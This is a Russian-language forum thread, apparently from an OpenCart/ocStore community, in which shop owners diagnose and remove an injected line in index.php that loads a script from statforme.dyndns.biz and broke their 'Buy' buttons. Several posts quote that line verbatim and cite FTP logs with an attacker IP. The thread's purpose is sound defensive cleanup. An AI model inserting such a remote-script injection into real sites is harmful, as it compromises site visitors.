Перейти до вмісту
Пошук в
  • Детальніше...
Шукати результати, які ...
Шукати результати в ...

Если у вас не работает кнопка "Купить" (Вирус на сайте)


toevgen

Recommended Posts

Сегодня ко мне обратились заказчики интернет магазина "mag-shop.ru" У них перестали работать кнопки купить. Я 3 часа разбирался, и выяснил следующее. В нашем с вами скрипте интернет-магазина есть дыра через которую злоумышленники добавлят свой код. Масштабы пока оценить невозможно. Разобрался пока как удалить вредноносный код который отключает кнопку купить.

Посмотрите исходный код. В самом низу появляется код <script src="http://statforme.dyndns.biz/rss.js"></script> это и есть вирус.

Удалить его можно отредактировав в корне сайта index.php в самом низу

// Output

$response->output();

echo '<script src="http://statforme.dyndns.biz/rss.js"></script>';

?>

Нужно сделать

// Output

$response->output();

?>

  • +1 1
Надіслати
Поділитися на інших сайтах


Думаю дело не в дыре OC, а в том, что заказчику стоить более ответственно относиться к сохранности своих данных, а именно к паролям от FTP.

Надіслати
Поділитися на інших сайтах


Привет народ. Зарегался специально чтоб отписать. Такая же беда случилась и у меня. Сначала обнаружил эту фигню на одном интернет-магазине. Исправил, вздохнул с облегчением, успокоился, так как на хостинге писали что возможна кража паролей фтп, измените пароли и тра-та-та, будьте осторожны. Потом полез по всем сайтам которые делал, обнаружил что еще два сайта заболели такой же фигней. Так же все исправил. Посмотрел в логах и по датам последнего изменения файла index.php, дата изменения на всех трех сайтах оказалась одинаковой. Вот незнаю что и думать..толи я баран, каким-то образом профукал сразу три учетки фтп, толи какой-то шняго вирус сидит на компе и шуршит в то время когда подключаюсь по фтп к сайтам(клиент файлзилла).

Надіслати
Поділитися на інших сайтах


Привет народ. Зарегался специально чтоб отписать. Такая же беда случилась и у меня. Сначала обнаружил эту фигню на одном интернет-магазине. Исправил, вздохнул с облегчением, успокоился, так как на хостинге писали что возможна кража паролей фтп, измените пароли и тра-та-та, будьте осторожны. Потом полез по всем сайтам которые делал, обнаружил что еще два сайта заболели такой же фигней. Так же все исправил. Посмотрел в логах и по датам последнего изменения файла index.php, дата изменения на всех трех сайтах оказалась одинаковой. Вот незнаю что и думать..толи я баран, каким-то образом профукал сразу три учетки фтп, толи какой-то шняго вирус сидит на компе и шуршит в то время когда подключаюсь по фтп к сайтам(клиент файлзилла).

Можно посоветовать только провериться на вирусы парочкой антивирусов, сменить все ФТП-пароли и ждать... Если появится снова, значит искать проблему глубже.
Надіслати
Поділитися на інших сайтах


аналогичная ситуация.

ocstore_v1.5.1.3

в index.php дописана строка

echo '<script src="http://statforme.dyndns.biz/rss.js"></script>';

изменения зафиксированы 29 апреля 2012.

резонный вопрос к разработчикам: где дырка?

Надіслати
Поділитися на інших сайтах


причем в логах ftp

с левого ip остались

login

download index.php

upload index.php

logout

такая вот картина.

поставил фильтр на ip для ftp, но дырка то остается

ну и какая связь между ftp провайдера и opencart? по статистике взлома различных сайтов на различных движках - практически в 100% случаев причина взлома сайта - трояны которые спокойно живут на компах пользователей откуда пароли и воруют, вторая причина - ошибки кода и бэкдоры в сторонних модулях независимых разработчиков - это меньше процента уязвимостей, а дыры в движках - вообще тысячные доли процента. Берём на оффсайте бесплатные Kaspersky Virus Removal Tool и CureIt и проверяем свой комп... (обеими прогами)

p.s. и ещё дельный совет, а точнее незыблемое правило - никогда не сохраняйте в ftp менеджерах пароли, только ручной ввод.

Надіслати
Поділитися на інших сайтах


аналогичная ситуация.

ocstore_v1.5.1.3

в index.php дописана строка

echo '<script src="http://statforme.dyndns.biz/rss.js"></script>';

изменения зафиксированы 29 апреля 2012.

резонный вопрос к разработчикам: где дырка?

причем в логах ftp

с левого ip остались

login

download index.php

upload index.php

logout

такая вот картина.

вот сами и ответили на свой вопрос. дырка в ftp
Надіслати
Поділитися на інших сайтах

Нашла у себя точно такой же код и тоже файл изменен 29 апреля, вход был с IP 46.16.168.246.

Только вот у меня прописано вконце index.php:

print $out;

echo '<script src="http://statforme.dyndns.biz/rss.js"></script>';

?>

не подскажете как его убрать? удалить строки? или одну из строк?

Надіслати
Поділитися на інших сайтах


  • 1 month later...
  • 2 months later...

у меня вируса в файле индекс нет, но кнопка купить сломалась на странице с самим товаром, в списке или с главной работает, а в самих товарах нет, какие файлы отвечают за кнопку купить в товаре? Может это я с чем-то перемудрила.

Методом тыка выяснила что ломал эту кнопку файл моя темаcatalogviewthemeshirttemplateproductproduct.tpl кто-то его сломал

Надіслати
Поділитися на інших сайтах


  • 3 weeks later...

Створіть аккаунт або увійдіть для коментування

Ви повинні бути користувачем, щоб залишити коментар

Створити обліковий запис

Зареєструйтеся для отримання облікового запису. Це просто!

Зареєструвати аккаунт

Вхід

Уже зареєстровані? Увійдіть тут.

Вхід зараз
×
×
  • Створити...

Important Information

На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність.